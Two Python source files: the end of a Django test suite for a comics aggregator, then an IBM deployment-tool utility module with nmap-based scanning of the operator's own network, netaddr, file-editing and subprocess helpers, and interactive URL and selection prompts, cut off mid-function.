self.assertEquals(from_date, self.cc.from_date)
def test_set_to_date(self):
to_date = datetime.date(2008, 3, 11)
self.cc._set_to_date(to_date)
self.assertEquals(to_date, self.cc.to_date)
def test_set_to_date_from_string(self):
to_date = datetime.date(2008, 3, 11)
self.cc._set_to_date(str(to_date))
self.assertEquals(to_date, self.cc.to_date)
def test_validate_dates_valid(self):
self.cc.from_date = datetime.date(2008, 3, 11)
self.cc.to_date = datetime.date(2008, 3, 11)
self.assertTrue(self.cc._validate_dates())
self.cc.from_date = datetime.date(2008, 2, 29)
self.cc.to_date = datetime.date(2008, 3, 2)
self.assertTrue(self.cc._validate_dates())
def test_validate_dates_invalid(self):
self.cc.from_date = datetime.date(2008, 3, 11)
self.cc.to_date = datetime.date(2008, 3, 10)
self.assertRaises(ComicsError, self.cc._validate_dates)
def test_get_comic_by_slug_valid(self):
expected = Comic.objects.get(slug='xkcd')
result = self.cc._get_comic_by_slug('xkcd')
self.assertEquals(expected, result)
def test_get_comic_by_slug_invalid(self):
self.assertRaises(ComicsError, self.cc._get_comic_by_slug, 'not slug')
def test_set_comics_to_crawl_two(self):
comic1 = Comic.objects.get(slug='xkcd')
comic2 = Comic.objects.get(slug='sinfest')
self.cc.set_comics_to_crawl(['xkcd', 'sinfest'])
self.assertEquals(2, len(self.cc.comics))
self.assert_(comic1 in self.cc.comics)
self.assert_(comic2 in self.cc.comics)
def test_set_comics_to_crawl_all(self):
all_count = Comic.objects.count()
self.cc.set_comics_to_crawl(None)
self.assertEquals(all_count, len(self.cc.comics))
self.cc.set_comics_to_crawl([])
self.assertEquals(all_count, len(self.cc.comics))
class ComicAggregatorTestCase(TestCase):
def setUp(self):
create_comics()
config = command.AggregatorConfig()
config.set_comics_to_crawl(None)
self.aggregator = command.Aggregator(config)
self.aggregator.identifier = 'slug'
self.comic = mock.Mock()
self.comic.slug = 'slug'
self.crawler_mock = mock.Mock()
self.crawler_mock.comic = self.comic
self.downloader_mock = mock.Mock()
def test_init(self):
self.assertIsInstance(self.aggregator.config, command.AggregatorConfig)
def test_init_optparse_config(self):
optparse_options_mock = mock.Mock()
optparse_options_mock.comic_slugs = None
optparse_options_mock.from_date = None
optparse_options_mock.to_date = None
optparse_options_mock.get.return_value = None
result = command.Aggregator(optparse_options=optparse_options_mock)
self.assertEquals(
len(self.aggregator.config.comics), len(result.config.comics))
self.assertEquals(
self.aggregator.config.from_date, result.config.from_date)
self.assertEquals(
self.aggregator.config.to_date, result.config.to_date)
def test_init_invalid_config(self):
self.assertRaises(AssertionError, command.Aggregator)
def test_crawl_one_comic_one_date(self):
pub_date = datetime.date(2008, 3, 1)
crawler_release = CrawlerRelease(self.comic, pub_date)
self.crawler_mock.get_crawler_release.return_value = crawler_release
self.aggregator._crawl_one_comic_one_date(
self.crawler_mock, pub_date)
self.assertEqual(1, self.crawler_mock.get_crawler_release.call_count)
self.crawler_mock.get_crawler_release.assert_called_with(pub_date)
def test_download_release(self):
crawler_release = CrawlerRelease(self.comic, datetime.date(2008, 3, 1))
self.aggregator._get_downloader = lambda: self.downloader_mock
self.aggregator._download_release(crawler_release)
self.assertEqual(1, self.downloader_mock.download.call_count)
self.downloader_mock.download.assert_called_with(crawler_release)
def test_get_valid_date_from_history_capable(self):
expected = datetime.date(2008, 3, 1)
self.crawler_mock.comic = Comic.objects.get(slug='xkcd')
self.crawler_mock.history_capable = expected
self.crawler_mock.current_date = datetime.date(2008, 4, 1)
result = self.aggregator._get_valid_date(
self.crawler_mock, datetime.date(2008, 2, 1))
self.assertEquals(expected, result)
def test_get_valid_date_from_config(self):
expected = datetime.date(2008, 3, 1)
self.crawler_mock.comic = Comic.objects.get(slug='xkcd')
self.crawler_mock.history_capable = datetime.date(2008, 1, 1)
self.crawler_mock.current_date = datetime.date(2008, 4, 1)
result = self.aggregator._get_valid_date(
self.crawler_mock, expected)
self.assertEquals(expected, result)
def test_get_crawler(self):
pass # TODO
def test_get_downloader(self):
pass # TODO
def test_aggregate_one_comic(self):
pass # TODO
def test_start(self):
pass # TODO
| datagutten/comics | comics/aggregator/tests/test_command.py | Python | agpl-3.0 | 6,333 |
# Copyright 2019 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from glob import glob
import os
import re
import sys
import datetime
import subprocess
import fileinput
import readline
from shutil import copy2, copyfile
from subprocess import Popen, PIPE
from netaddr import IPNetwork, IPAddress, IPSet
from tabulate import tabulate
from textwrap import dedent
import hashlib
from distro import linux_distribution
from lib.config import Config
import lib.logger as logger
from lib.exception import UserException
PATTERN_DHCP = r"^\|_*\s+(.+):(.+)"
PATTERN_MAC = r'([\da-fA-F]{2}:){5}[\da-fA-F]{2}'
PATTERN_IP = (r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')
PATTERN_EMBEDDED_IP = (r'(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)')
CalledProcessError = subprocess.CalledProcessError
LOG = logger.getlogger()
DHCP_SERVER_CMD = "sudo nmap --script broadcast-dhcp-discover -e {0}"
def parse_dhcp_servers(nmap_response):
""" parse nmap output response
Args:
nmap_response (str): Output of nmap --script broadcast-dhcp-discover -e
Returns:
data (dict): dictionary parsed from data
{'Broadcast Address': '192.168.12.255',
'DHCP Message Type': 'DHCPOFFER',
'Domain Name Server': '192.168.12.2',
'IP Address Lease Time: 0 days, 0:02': '00',
'IP Offered': '192.168.12.249',
'Rebinding Time Value: 0 days, 0:01': '45',
'Renewal Time Value: 0 days, 0:01': '00',
'Router': '192.168.12.3',
'Server Identifier': '192.168.12.2',
'Subnet Mask': '255.255.255.0',
'broadcast-dhcp-discover': ''}
"""
matches = re.findall(PATTERN_DHCP, nmap_response, re.MULTILINE)
data = {a: b.strip() for a, b in matches}
return data
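# Illustrative sketch (abridged, made-up nmap output; not part of the original module):
# parse_dhcp_servers extracts the "key: value" pairs from broadcast-dhcp-discover output.
def _example_parse_dhcp_servers():
    sample = ("|   DHCP Message Type: DHCPOFFER\n"
              "|   Server Identifier: 192.168.12.2\n"
              "|_  Subnet Mask: 255.255.255.0\n")
    return parse_dhcp_servers(sample)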
def get_dhcp_servers(interface):
""" get dhcp servers by running nmap
Args:
interface (str): interface to query for dhcp servers
Returns:
output (str): string output of command
"""
cmd = DHCP_SERVER_CMD.format(interface)
output = ""
data = None
try:
output = bash_cmd(cmd)
except Exception as e:
LOG.error("{0}".format(e))
raise e
else:
data = parse_dhcp_servers(output)
return data
def has_dhcp_servers(interface):
""" does interface have dhcp servers
Args:
interface (str): interface to query for dhcp servers
Returns:
isTrue (int): true or false
"""
try:
dct = get_dhcp_servers(interface)
return 'DHCPOFFER' in dct['DHCP Message Type']
except:
pass
return False
def scan_subnet(cidr):
"""Scans a subnet for responding devices.
Args:
cidr (str): subnet in cidr format or can be list of ips separated by
spaces
Returns:
list of tuples of (ip_addr, mac_addr)
"""
cmd = f'sudo nmap -sn {cidr}'
res, err, rc = sub_proc_exec(cmd)
items = []
if rc != 0:
LOG.error(f'Error while scanning subnet {cidr}, rc: {rc}')
for line in res.split('Nmap scan report'):
match = re.search(PATTERN_EMBEDDED_IP, line)
if match:
ip = match.group(0)
match2 = re.search(PATTERN_MAC, line)
if match2:
mac = match2.group(0)
else:
mac = ''
items += [(ip, mac)]
return items
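# Usage sketch (hypothetical subnet; requires nmap and sudo, so left uncalled):
def _example_scan_subnet():
    return scan_subnet('192.168.12.0/24')  # e.g. [('192.168.12.2', 'AA:BB:CC:DD:EE:FF'), ...]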
def scan_subnet_for_port_open(cidr, port):
"""Scans a subnet for responding devices.
Args:
cidr (str or list): subnet in cidr format or can be list of ips
separated by spaces.
port (str or int) : tcp port to check
returns: (list): list of tuples with ip and mac address
"""
if isinstance(cidr, list):
cidr = ' '.join(cidr)
cmd = f'sudo nmap -p {port} {cidr}'
res, err, rc = sub_proc_exec(cmd)
items = []
if rc != 0:
LOG.error(f'Error while scanning subnet {cidr}, rc: {rc}')
for line in res.split('Nmap scan report'):
match = re.search(PATTERN_EMBEDDED_IP, line)
if match:
ip = match.group(0)
match2 = re.search(r'\d+/tcp\s+open.+' + rf'({PATTERN_MAC})', line,
re.DOTALL)
if match2:
mac = match2.group(1)
if match2:
items += [(ip, mac)]
return items
def is_ipaddr(ip):
if re.search(PATTERN_IP, ip):
return True
def is_netmask(mask):
from netaddr import AddrFormatError
try:
if IPAddress(mask).is_netmask():
res = True
else:
res = False
except AddrFormatError:
res = False
return res
def get_network_addr(ipaddr, prefix):
""" Return the base address of the subnet in which the ipaddr / prefix
reside.
"""
return str(IPNetwork(f'{ipaddr}/{prefix}').network)
def get_netmask(prefix):
return str(IPNetwork(f'0.0.0.0/{prefix}').netmask)
def get_prefix(netmask):
return IPAddress(netmask).netmask_bits()
def get_network_size(cidr):
""" return the decimal size of the cidr address
"""
return IPNetwork(cidr).size
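# Worked examples for the small netaddr helpers above (values chosen for illustration):
def _example_network_helpers():
    assert get_network_addr('192.168.12.249', 24) == '192.168.12.0'
    assert get_netmask(24) == '255.255.255.0'
    assert get_prefix('255.255.255.0') == 24
    assert get_network_size('192.168.12.0/24') == 256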
def add_offset_to_address(addr, offset):
"""calculates an address with an offset added. offset can be negative.
Args:
addr (str): ipv4 or cidr representation of address
offset (int): integer offset
Returns:
addr_.ip (str) address in ipv4 representation
"""
addr_ = IPNetwork(addr)
addr_.value += offset
return str(addr_.ip)
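# Worked example (illustrative addresses); the offset may be negative:
def _example_add_offset_to_address():
    assert add_offset_to_address('192.168.12.0/24', 10) == '192.168.12.10'
    assert add_offset_to_address('192.168.12.10', -9) == '192.168.12.1'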
def is_overlapping_addr(subnet1, subnet2):
""" Checks if two ipv4 subnets are overlapping
Inputs:
subnet1,subnet2 (str) ipv4 subnet in cidr format
Returns:
True if the two subnets overlap, False if they do not.
"""
if IPSet([subnet1]).intersection(IPSet([subnet2])):
return True
else:
return False
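# Worked example (illustrative subnets): a /24 inside a /16 overlaps, disjoint /24s do not.
def _example_is_overlapping_addr():
    assert is_overlapping_addr('192.168.12.0/24', '192.168.0.0/16')
    assert not is_overlapping_addr('192.168.12.0/24', '10.0.0.0/24')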
def bash_cmd(cmd):
"""Run command in Bash subprocess
Args:
cmd (str): Command to run
Returns:
output (str): stdout from command
"""
log = logger.getlogger()
_cmd = ['bash', '-c', cmd]
log.debug('Run subprocess: %s' % ' '.join(_cmd))
output = subprocess.check_output(_cmd, universal_newlines=True,
stderr=subprocess.STDOUT)
try:
output = output.decode('utf-8')
except AttributeError:
pass
log.debug(output)
return output
def backup_file(path, suffix='.orig', multi=True):
"""Save backup copy of file
Backup copy is saved as the name of the original with the value of suffix
appended. If multi is True, and a backup already exists, an additional
backup is made with a numeric index value appended to the name. The backup
copy filemode is set to read-only.
Args:
path (str): Path of file to backup
suffix (str): String to append to the filename of the backup
multi (bool): Set False to only make a backup if one does not exist
already.
"""
log = logger.getlogger()
backup_path = path + suffix
version = 0
while os.path.exists(backup_path) and multi:
version += 1
backup_path += "." + str(version)
log.debug('Make backup copy of original file: \'%s\'' % backup_path)
copy2(path, backup_path)
os.chmod(backup_path, 0o444)
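# Usage sketch (hypothetical path; the file must exist): the first call writes
# foo.conf.orig as a read-only copy, later calls add .orig.1, .orig.2, ...
def _example_backup_file():
    backup_file('/tmp/foo.conf')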
def append_line(path, line, check_exists=True):
"""Append line to end of text file
Args:
path (str): Path of file
line (str): String to append
check_exists(bool): Check if line exists before appending
"""
log = logger.getlogger()
log.debug('Add line \'%s\' to file \'%s\'' % (line, path))
if not line.endswith('\n'):
line += '\n'
exists = False
if check_exists:
with open(path, 'r') as file_in:
for read_line in file_in:
if read_line == line:
exists = True
if not exists:
with open(path, 'a') as file_out:
file_out.write(line)
def remove_line(path, regex):
"""Remove line(s) from file containing a regex pattern
Any lines matching the regex pattern will be removed.
Args:
path (str): Path of file
regex (str): Regex pattern
"""
log = logger.getlogger()
log.debug('Remove lines containing regex \'%s\' from file \'%s\'' %
(regex, path))
for line in fileinput.input(path, inplace=1):
if not re.match(regex, line):
print(line, end='')
def line_in_file(path, regex, replace, backup=None):
"""If 'regex' exists in the file specified by path, then replace it with
the value in 'replace'. Else append 'replace' to the end of the file. This
facilitates simplified changing of a parameter to a desired value if it
already exists in the file or adding the parameter if it does not exist.
Inputs:
path (str): path to the file
regex (str): Python regular expression
replace (str): Replacement string
backup (str): If specified, a backup of the original file will be made
if a backup does not already exist. The backup is made in the same
directory as the original file by appending the value of backup to
the filename.
"""
if os.path.isfile(path):
if backup:
backup_file(path, multi=False)
try:
with open(path, 'r') as f:
data = f.read()
except FileNotFoundError as exc:
print(f'File not found: {path}. Err: {exc}')
else:
data = data.splitlines()
in_file = False
# open 'r+' to maintain owner
with open(path, 'r+') as f:
for line in data:
in_line = re.search(regex, line)
if in_line:
line = re.sub(regex, replace, line)
in_file = True
f.write(line + '\n')
if not in_file:
f.write(replace + '\n')
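# Usage sketch (hypothetical file and setting): force a parameter to a known value,
# appending the line if nothing matches the regex.
def _example_line_in_file():
    line_in_file('/etc/ssh/sshd_config', r'^PermitRootLogin.+',
                 'PermitRootLogin no', backup='.orig')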
def replace_regex(path, regex, replace):
"""Replace line(s) from file containing a regex pattern
Any lines matching the regex pattern will be removed and replaced
with the 'replace' string.
Args:
path (str): Path of file
regex (str): Regex pattern
replace (str): String to replace matching line
"""
log = logger.getlogger()
log.debug('Replace regex \'%s\' with \'%s\' in file \'%s\'' %
(regex, replace, path))
for line in fileinput.input(path, inplace=1):
print(re.sub(regex, replace, line), end='')
def copy_file(source, dest, metadata=True):
"""Copy a file to a given destination
Args:
source (str): Path of source file
dest (str): Destination path to copy file to
metadata (bool, optional): Attempt to preserve file metadata
"""
log = logger.getlogger()
log.debug(f'Copy file, source:{source} dest:{dest} metadata:{metadata}')
if metadata:
copy2(source, dest)
else:
if os.path.isdir(dest):
basename = os.path.basename(source)
dest = os.path.join(dest, basename)
copyfile(source, dest)
def sub_proc_launch(cmd, stdout=PIPE, stderr=PIPE):
"""Launch a subprocess and return the Popen process object.
This is non blocking. This is useful for long running processes.
"""
log = logger.getlogger()
log.debug(f"sub_proc_launch cmd='{cmd}' stdout='{stdout}' stderr='{stderr}'")
proc = Popen(cmd.split(), stdout=stdout, stderr=stderr)
return proc
def sub_proc_exec(cmd, stdout=PIPE, stderr=PIPE, shell=False, env=None):
"""Launch a subprocess wait for the process to finish.
Returns stdout from the process
This is blocking
"""
log = logger.getlogger()
log.debug(f"sub_proc_exec cmd='{cmd}' stdout='{stdout}' stderr='{stderr}' "
f"shell='{shell}' env='{env}'")
if not shell:
cmd = cmd.split()
proc = Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
stdout, stderr = proc.communicate()
try:
stdout = stdout.decode('utf-8')
except AttributeError:
pass
try:
stderr = stderr.decode('utf-8')
except AttributeError:
pass
log.debug(f"sub_proc_exec stdout='{stdout}' stderr='{stderr}' "
f"rc='{proc.returncode}'")
return stdout, stderr, proc.returncode
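# Usage sketch (illustrative command): run a command and capture stdout, stderr and rc.
def _example_sub_proc_exec():
    stdout, stderr, rc = sub_proc_exec('uname -r')
    return stdout.strip() if rc == 0 else stderr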
def sub_proc_display(cmd, stdout=None, stderr=None, shell=False, env=None):
"""Popen subprocess created without PIPES to allow subprocess printing
to the parent screen. This is a blocking function.
"""
log = logger.getlogger()
log.debug(f"sub_proc_display cmd='{cmd}' stdout='{stdout}' "
f"stderr='{stderr}' shell='{shell}' env='{env}'")
if not shell:
cmd = cmd.split()
proc = Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
proc.wait()
rc = proc.returncode
log.debug(f"sub_proc_display rc='{rc}'")
return rc
def sub_proc_wait(proc):
"""Launch a subprocess and display a simple time counter while waiting.
This is a blocking wait. NOTE: sleeping (time.sleep()) in the wait loop
dramatically reduces performance of the subprocess. It would appear the
subprocess does not get its own thread.
"""
log = logger.getlogger()
cnt = 0
rc = None
while rc is None:
rc = proc.poll()
print('\rwaiting for process to finish. Time elapsed: {:2}:{:2}:{:2}'.
format(cnt // 3600, cnt % 3600 // 60, cnt % 60), end="")
sys.stdout.flush()
cnt += 1
print('\n')
resp, err = proc.communicate()
log.debug(f"results: resp='{resp}' err='{err}' rc='{rc}'")
print(resp)
return rc
class Color:
black = '\033[90m'
red = '\033[91m'
green = '\033[92m'
yellow = '\033[33m'
brt_yellow = '\033[93m'
blue = '\033[94m'
purple = '\033[95m'
cyan = '\033[96m'
white = '\033[37m'
brt_white = '\033[97m'
bold = '\033[1m'
underline = '\033[4m'
sol = '\033[1G'
clr_to_eol = '\033[K'
clr_to_bot = '\033[J'
scroll_five = '\n\n\n\n\n'
scroll_ten = '\n\n\n\n\n\n\n\n\n\n'
up_one = '\033[1A'
up_five = '\033[5A'
up_ten = '\033[10A'
header1 = ' ' + bold + underline
endc = '\033[0m'
def heading1(text='-', width=79, indent=10):
ind = ''.join([' ' for i in range(indent)])
text1 = f'{ind}{Color.bold}{Color.underline}{text}{Color.endc}'
print(f'\n{text1: <{width + 8}}')
def bold(text):
return Color.bold + text + Color.endc
def rlinput(prompt, prefill=''):
log = logger.getlogger()
log.debug(f"prompt='{repr(prompt)}' prefill='{prefill}'")
readline.set_startup_hook(lambda: readline.insert_text(prefill))
try:
user_input = input(prompt)
log.debug(f"user_input='{user_input}'")
return user_input
finally:
readline.set_startup_hook()
def files_present(url, fileglobs, _all=True):
"""Return true if any/all of the fileglobs are present in the url.
"""
log = logger.getlogger()
any_present = False
all_present = True
fileglobsstr = ','.join(fileglobs)
if fileglobs:
cmd = (f'wget -r -l 10 -nd -np --spider --accept={fileglobsstr} {url}')
reply, err, rc = sub_proc_exec(cmd)
err = err.replace('%2B', '+')
if rc == 0:
for fileglob in fileglobs:
regx = fileglob_to_regx(fileglob)
res = re.findall(regx, err)
log.debug(f"fileglob='{fileglob}' regx='{regx}' res='{res}'")
if len(res) == 0:
all_present = False
log.warning(f"File not found in repo: {fileglob}")
else:
any_present = True
if not fileglobs:
return True
if _all:
return all_present
else:
return any_present
def fileglob_to_regx(fileglob):
regx = fileglob.replace('.', r'\.')
regx = regx.replace('+', r'\+')
regx = regx.replace(']*', '][0-9]{0,3}')
regx = regx.replace('*', '.*')
regx = 'http.+' + regx
return regx
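# Worked example (illustrative glob): the translated pattern is anchored to an http URL
# so it can be matched against wget spider output.
def _example_fileglob_to_regx():
    assert fileglob_to_regx('cuda*.rpm') == r'http.+cuda.*\.rpm'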
def get_url(url='http://', fileglob='', prompt_name='', repo_chk='',
contains=[], excludes=[], filelist=[]):
"""Input a URL from user. The URL is checked for validity using curl and
wget and the user can continue modifying it indefinitely until a response
is obtained or he can enter 'sss' to skip (stop) entry.
If a fileglob is specified, the specified url is searched
recursively (crawled) up to 10 levels deep looking for matches.
If repo_chk is specified, the url is searched recursively looking for a
marker specific to that repo type. If multiple URL's are found, the
list of found url's is filtered using 'contains', 'excludes' and
'files_present'. The user is again prompted to make a selection.
fileglob and repo_chk are mutually exclusive.
If neither fileglob nor repo_chk are specified, and the url does not end
in '/' then the url is assumed to be looking for a file.
Inputs:
url (str). Valid URLs are http:, https:, and file:
fileglob (str) standard linux fileglobs with *, ? or []
repo_chk (str) 'yum', 'ana' or 'pypi'
contains (list of strings) Filter criteria to be used in combination
with repo_chk. After finding repos of the type in 'repo_chk', the
list is restricted to those urls that contain elements from
'contains' and no elements of 'excludes'.
excludes (list of strings)
filelist (list of strings) Can be globs. Used to validate a repo. The
specified files must be present
prompt_name (str) Used for prompting only.
Output:
url (str) URL for one file or repository directory
"""
from lib.genesis import GEN_SOFTWARE_PATH
print(f'Enter {prompt_name} URL. ("sss" at end of URL to skip)')
if fileglob:
print('Do not include filenames in the URL. A search of the URL')
print('will be made up to 10 levels deep')
while True:
url = rlinput(f'Enter URL: ', url)
if url.endswith('sss'):
url = None
break
if 'artifactory.swg' in url:
fnd_creds = False
while not fnd_creds:
path = os.path.join(GEN_SOFTWARE_PATH, 'artifactory.credentials')
if os.path.isfile(path):
with open(path, 'r') as f:
creds = f.read().rstrip('\n')
fnd_creds = True
else:
print('No artifactory credentials file found')
r = get_selection('Retry\nTerminate Sofware install',
('R', 'T'))
if r == 'T':
sys.exit('PowerUp software install terminated by user')
url = f'https://{creds}{url}'
break
if repo_chk:
url = url if url.endswith('/') else url + '/'
try:
# Basic response test
cmd = f'curl --max-time 2 -I {url}'
url_info, err, rc = sub_proc_exec(cmd)
except:
pass
else:
if 'http:' in url or 'https:' in url:
response = re.search(r'HTTP\/\d+.\d+\s+200\s+ok', url_info,
re.IGNORECASE)
if response:
repo_mrkr = {'yum': '/repodata/', 'ana': 'repodata.json',
'pypi': '/simple/'}
print(response.group(0))
if repo_chk:
ss = repo_mrkr[repo_chk]
elif fileglob:
ss = fileglob
elif url[-1] != '/':
ss = os.path.basename(url)
url = os.path.dirname(url)
cmd = ('wget -r -l 10 -nd -np --spider '
f'--accept={ss} {url}')
reply, err, rc = sub_proc_exec(cmd)
err = err.replace('%2B', '+')
if rc == 0:
if repo_chk:
regx = 'http.+' + repo_mrkr[repo_chk]
elif fileglob:
regx = fileglob_to_regx(fileglob)
_found = re.findall(regx, err)
# remove dups
_found = list(set(_found))
found = []
# Include items containing any element of 'contains'
# and exclude items containing any element of
# 'excludes' If no item meets criteria, then use
# any / all items but include a warning.
if repo_chk:
for _url in _found:
if (any([item for item in contains if item in
_url]) and not any([item for item in
excludes if item
in _url])):
found.append(_url)
if found:
_list = found
elif _found:
_list = _found
if repo_chk:
print(bold('\nWarning. The following url(s) '
'were found but do not match the '
'search criteria'))
else:
_list = []
if _list:
ch, sel = get_selection(_list, allow_none=True)
if ch != 'N':
if repo_chk:
sel = sel.rstrip('/')
url = os.path.dirname(sel)
if files_present(url, filelist):
break
else:
print('\nChosen URL does not appear '
'to be valid. File check '
'failed.')
if get_yesno('Use selection anyway'):
break
else:
url = sel
break
else:
print('No match found.')
else:
print(f'Error reading url. {reply}')
else:
print('Invalid url')
err = re.search('curl: .+', err)
if err:
print(err.group(0))
tmp = re.search(r'HTTP\/\d+.\d+\s+.+', url_info)
if tmp:
print(tmp.group(0))
elif 'file:///' in url:
response = re.search(r'Content-Length:\s+\d+', url_info)
if response:
if repo_chk == 'yum':
ss = '/repodata'
elif repo_chk == 'ana':
ss = '/repodata.json'
elif repo_chk == 'pypi':
ss = '/simple'
if repo_chk:
ss = url + ss
elif fileglob:
ss = url + fileglob
ss = '/' + ss.lstrip('file:/')
files = glob(ss, recursive=True)
if files:
ch, sel = get_selection(files, allow_none=True)
if ch != 'N':
url = 'file://' + os.path.dirname(sel) + '/'
break
else:
print('No match found.')
elif 'file:' in url:
print('Proper file url format: "file:///path/to/file')
response = ''
else:
response = ''
return url
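# Usage sketch (illustrative arguments; interactive, so left uncalled): prompt for a yum
# repository URL and require repodata plus a release rpm to be present before accepting it.
def _example_get_url():
    return get_url(url='http://', repo_chk='yum', prompt_name='EPEL',
                   contains=['epel'], excludes=['testing'],
                   filelist=['epel-release*.rpm'])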
def get_yesno(prompt='', yesno='[y]/n', default=''):
"""Prompts user for a yes or no response.
Args:
prompt(str): Prompt text.
yesno(str): The yes / no part of the user prompt. yesno is
appended to prompt. There must be a '/' in yesno. The
portion of yesno to the left of the '/' is considered the
yes response, the portion to the right of the '/' is
considered to be the no response. By enclosing the yes or no
part of the yesno in brackets you instruct get_yesno to accept
an empty response (nothing or only spaces) as that.
"""
log = logger.getlogger()
log.debug(f"prompt='{repr(prompt)}' yesno='{yesno}' default='{default}'")
try:
def_resp = yesno[1 + yesno.index('['):yesno.index(']')]
except ValueError:
def_resp = ''
yn = yesno.replace('[', '')
yn = yn.replace(']', '')
yn = yn.split('/')
while True:
r = rlinput(f'{prompt}({yesno})? ', default)
if def_resp and not r.strip():
ret = True if def_resp == yn[0] else False
return ret
elif r == yn[0]:
return True
elif r == yn[-1]:
return False
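# Usage sketch (interactive, so left uncalled; prompt text is illustrative): an empty
# response returns the bracketed default, here "y" -> True.
def _example_get_yesno():
    return get_yesno('Continue with install ', yesno='[y]/n')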
def get_dir(src_dir):
"""Interactive selection of a source dir. Searching starts in the cwd.
Returns:
path (str or None) : Selected path
"""
rows = 10
if not src_dir:
path = os.path.abspath('.')
else:
path = src_dir
# path = os.getcwd()
while True:
path = rlinput(f'Enter an absolute directory location (S to skip): ',
path)
if path == 'S':
return None
if os.path.exists(path):
rpm_filelist = []
non_rpm_filelist = []
print()
top, dirs, files = next(os.walk(path))
files.sort()
rpm_cnt = 0
non_rpm_cnt = 0
for f in files:
if f.endswith('.rpm'):
rpm_filelist.append(f)
rpm_cnt += 1
else:
non_rpm_filelist.append(f)
non_rpm_cnt += 1
cnt = min(10, max(rpm_cnt, non_rpm_cnt))
rpm_filelist += rows * ['']
list1 = rpm_filelist[:cnt]
non_rpm_filelist += rows * ['']
list2 = non_rpm_filelist[:cnt]
print('\n' + bold(path))
print(tabulate(list(zip(list1, list2)),
headers=[bold('RPM Files'),
bold('Other files')], tablefmt='psql'))
if rpm_cnt > 0:
print(bold(f'{rpm_cnt} rpm files found'))
print(f'including the {min(10, rpm_cnt)} files above.\n')
else:
print(bold('No rpm files found\n'))
if non_rpm_cnt > 0:
print(bold(f'{non_rpm_cnt} other files found'))
print(f'including the {min(10, non_rpm_cnt)} files above.')
else:
print(bold('No non rpm files found'))
print('\nSub directories of the entered directory: ')
dirs.sort()
print(dirs)
print(f'\nThe entered path was: {top}')
if get_yesno('Use the entered path '):
return path
def scan_ping_network(network_type='all', config_path=None):
cfg = Config(config_path)
type_ = cfg.get_depl_netw_client_type()
if network_type == 'pxe' or network_type == 'all':
net_type = 'pxe'
idx = type_.index(net_type)
cip = cfg.get_depl_netw_client_cont_ip()[idx]
netprefix = cfg.get_depl_netw_client_prefix()[idx]
cidr_cip = IPNetwork(cip + '/' + str(netprefix))
net_c = str(IPNetwork(cidr_cip).network)
cmd = 'fping -a -r0 -g ' + net_c + '/' + str(netprefix)
result, err, rc = sub_proc_exec(cmd)
print(result)
if network_type == 'ipmi' or network_type == 'all':
net_type = 'ipmi'
idx = type_.index(net_type)
cip = cfg.get_depl_netw_client_cont_ip()[idx]
netprefix = cfg.get_depl_netw_client_prefix()[idx]
cidr_cip = IPNetwork(cip + '/' + str(netprefix))
net_c = str(IPNetwork(cidr_cip).network)
cmd = 'fping -a -r0 -g ' + net_c + '/' + str(netprefix)
result, err, rc = sub_proc_exec(cmd)
print(result)
def get_selection(items, choices=None, prompt='Enter a selection: ', sep='\n',
allow_none=False, allow_retry=False):
"""Prompt user to select a choice. Entered choice can be a member of
choices or items, but a member of choices is always returned as choice. If
choices is not specified a numeric list is generated. Note that if choices
or items is a string it will be 'split' using sep. If you wish to include
    sep in the displayed choices or items, an alternate separator can be
specified.
ex: ch, item = get_selection('Apple pie\nChocolate cake')
ex: ch, item = get_selection('Apple pie.Chocolate cake', 'Item 1.Item 2',
sep='.')
Inputs:
choices (str or list or tuple): Choices. If not specified, a numeric
list is generated.
items (str or list or tuple): Description of choices or items to select
returns:
ch (str): One of the elements in choices
    item (str): matching item from items
"""
log = logger.getlogger()
log.debug(f"items='{repr(items)}' choices='{repr(choices)}' "
f"prompt='{repr(prompt)}' sep='{repr(sep)}' "
f"allow_none='{allow_none}' allow_retry='{allow_retry}'")
if not items:
return None, None
if not isinstance(items, (list, tuple)):
items = items.rstrip(sep)
items = items.split(sep)
if not choices:
choices = [str(i) for i in range(1, 1 + len(items))]
if not isinstance(choices, (list, tuple)):
choices = choices.rstrip(sep)
choices = choices.split(sep)
if allow_none:
choices.append('N')
items.append('Return without making a selection.')
if allow_retry:
choices.append('R')
items.append('Retry the search.')
if len(choices) == 1:
return choices[0], items[0]
maxw = 1
for ch in choices:
maxw = max(maxw, len(ch))
print()
for i in range(min(len(choices), len(items))):
print(bold(f'{choices[i]: <{maxw}}') + ' - ' + items[i])
print()
ch = ' '
while not (ch in choices or ch in items):
ch = input(f'{Color.bold}{prompt}{Color.endc}')
if not (ch in choices or ch in items):
print('Not a valid selection')
print(f'Choose from {choices}')
ch = ' '
if ch not in choices:
# not in choices so it must be in items
ch = choices[items.index(ch)]
item = items[choices.index(ch)]
if item == 'Return without making a selection.':
item = None
print()
log.debug(f"results: ch='{ch}' item='{item}'")
return ch, item
def get_src_path(src_name):
"""Search local disk for src_name and allow interactive selection if more
than one match. Note that the user is not given the option to change the
search criteria. Searching starts recursively in the /home directory and
expands to entire file system if no match in /home.
"""
log = logger.getlogger()
while True:
cmd = (f'find /home -name {src_name}')
resp1, err, rc1 = sub_proc_exec(cmd)
if rc1 != 0:
log.error(f'Error searching for {src_name}')
cmd = (f'find /root -name {src_name}')
resp2, err, rc2 = sub_proc_exec(cmd)
if rc2 != 0:
log.error(f'Error searching for {src_name}')
if rc1 != 0 and rc2 != 0:
return None
resp = resp1 + resp2
if not resp:
cmd = (f'find / -name {src_name}')
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
log.error(f'Error searching for {src_name}')
return None
if not resp:
print(f'Source file {src_name} not found')
if not get_yesno('Search again', 'y/no', default='y'):
log.error(f'Source file {src_name} not found.\n '
f'{src_name} is not setup in the POWER-Up '
'software server.')
return None
else:
ch, src_path = get_selection(resp,
prompt='Select a source file: ',
